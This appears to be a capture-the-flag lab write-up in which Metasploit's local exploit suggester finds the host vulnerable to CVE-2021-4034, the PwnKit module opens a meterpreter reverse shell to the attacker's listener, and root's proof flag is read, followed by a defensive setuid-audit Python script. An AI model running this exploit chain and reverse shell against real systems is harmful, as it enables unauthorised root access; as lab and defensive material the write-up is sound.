    Matching Modules
    ================
    
       #  Name                                      Disclosure Date  Rank    Check  Description
       -  ----                                      ---------------  ----    -----  -----------
       0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester
    
    
    Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
    
    msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
    msf6 post(multi/recon/local_exploit_suggester) > show options 
    
    Module options (post/multi/recon/local_exploit_suggester):
    
       Name             Current Setting  Required  Description
       ----             ---------------  --------  -----------
       SESSION                           yes       The session to run this module on
       SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
    
    msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
    SESSION => 1
    msf6 post(multi/recon/local_exploit_suggester) > run
    
    [*] 192.168.56.241 - Collecting local exploits for x86/linux...
    [*] 192.168.56.241 - 167 exploit checks are being tried...
    [+] 192.168.56.241 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
    [+] 192.168.56.241 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
    [+] 192.168.56.241 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
    [+] 192.168.56.241 - exploit/linux/local/pkexec: The service is running, but could not be validated.
    [+] 192.168.56.241 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
    [+] 192.168.56.241 - exploit/linux/local/su_login: The target appears to be vulnerable.
    [*] Running check method for exploit 48 / 48
    [*] 192.168.56.241 - Valid modules for session 1:
    ============================
    
     #   Name                                                               Potentially Vulnerable?  Check Result
     -   ----                                                               -----------------------  ------------
     1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
     2   exploit/linux/local/netfilter_priv_esc_ipv4                        Yes                      The target appears to be vulnerable.
     3   exploit/linux/local/network_manager_vpnc_username_priv_esc         Yes                      The service is running, but could not be validated.
     4   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
     5   exploit/linux/local/ptrace_sudo_token_priv_esc                     Yes                      The service is running, but could not be validated.
     6   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.
    
    
msf6 post(multi/recon/local_exploit_suggester) >  use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:6666 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.aznhokm
[+] The target is vulnerable.
[*] Writing '/tmp/.echgnco/vfwgxvdzhmrm/vfwgxvdzhmrm.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.echgnco
[*] Sending stage (3020772 bytes) to 192.168.56.241
[+] Deleted /tmp/.echgnco/vfwgxvdzhmrm/vfwgxvdzhmrm.so
[+] Deleted /tmp/.echgnco/.hvcnamcdo
[+] Deleted /tmp/.echgnco
[*] Meterpreter session 2 opened (192.168.56.230:6666 -> 192.168.56.241:47181) at 2023-04-02 23:53:34 -0400

meterpreter > shell
Process 15533 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1000(smbuser)
cd /root
ls -alh
total 44K
drwxr--r--.  4 root   root   4.0K Feb 20  2020 .
dr-xr-xr-x. 18 root   root   4.0K Feb 18  2020 ..
-rwxr--r--.  1 root   root     84 Feb 20  2020 .bash_history
-rwxr--r--.  1 root   root     18 Dec 29  2013 .bash_logout
-rwxr--r--.  1 root   root    176 Dec 29  2013 .bash_profile
-rwxr--r--.  1 root   root    176 Dec 29  2013 .bashrc
-rwxr--r--.  1 root   root    100 Dec 29  2013 .cshrc
drwxr--r--.  3 root   root     18 Feb 18  2020 .pki
drwxr--r--   2 root   root      6 Feb 19  2020 .ssh
-rwxr--r--.  1 root   root    129 Dec 29  2013 .tcshrc
-rwxr--r--   1 root   root   6.0K Feb 20  2020 .viminfo
-rwxr--r--   1 nobody nobody   48 Feb 20  2020 proof.txt
cat proof.txt
Best of Luck
af52e0163b03cbf7c6dd146351594a43

At this point we have a root shell and the root flag.
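The local exploit suggester above reports the host as vulnerable to CVE-2021-4034 (pkexec). The standard mitigation on an unpatched host is to remove the setuid bit from pkexec until the polkit package is updated, and more generally to keep the set of setuid-root binaries checked against a known baseline. As an added example, not from the post, this Python script audits (path, mode, uid) entries against an allowlist and reports whether a setuid pkexec is still present; `walk_tree` collects such entries from a live filesystem. The allowlist is a constructed, abbreviated placeholder, and the entries used in the test are constructed too.

```python
import os
import stat

# Constructed, abbreviated baseline of setuid binaries expected on a stock
# CentOS 7 host; replace with a baseline taken from a known-good image.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/chage",
}


def is_setuid(mode):
    """True if the setuid bit is set in an st_mode value."""
    return bool(mode & stat.S_ISUID)


def audit_suid(entries, allowlist=EXPECTED_SUID):
    """entries: iterable of (path, st_mode, st_uid).
    Returns (unexpected, pkexec_setuid): unexpected is a sorted list of
    (path, owner_uid) for setuid files not in the allowlist; pkexec_setuid
    says whether a setuid pkexec is still present (CVE-2021-4034 exposure
    if polkit is unpatched)."""
    unexpected, pkexec_setuid = [], False
    for path, mode, uid in entries:
        if not is_setuid(mode):
            continue
        if os.path.basename(path) == "pkexec":
            pkexec_setuid = True
        if path not in allowlist:
            unexpected.append((path, uid))
    return sorted(unexpected), pkexec_setuid


def walk_tree(root):
    """Yield (path, st_mode, st_uid) for regular files under root (live FS).
    lstat is used so symlinks are not followed out of the tree."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield p, st.st_mode, st.st_uid


def remediation(unexpected, pkexec_setuid):
    """Human-readable actions.  chmod 0755 on pkexec is the documented interim
    mitigation for CVE-2021-4034 until the polkit package is updated."""
    lines = []
    if pkexec_setuid:
        lines.append("chmod 0755 /usr/bin/pkexec  # interim, then update polkit")
    for path, uid in unexpected:
        lines.append(f"review setuid on {path} (owner uid {uid})")
    return lines


if __name__ == "__main__":
    found = list(walk_tree("/usr/bin"))
    bad, pk = audit_suid(found)
    print("\n".join(remediation(bad, pk)) or "no unexpected setuid binaries")
```

Run it over `/usr/bin`, `/usr/sbin` and any other directory on the PATH, and diff the output against the same run on a freshly installed image; anything setuid that the baseline does not explain (including a payload dropped into /tmp and later chmod-ed) stands out immediately.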

Lessons learned

  1. On this box the usual approach, uploading the public key over SMB into the target's smbdata directory and then using ProFTPd's mod_copy vulnerability to copy it into smbuser's home directory, does not work: permission denied.

  2. Do not neglect information gathering on every protocol; on this box, for example, port 80 actually served a text file containing a password.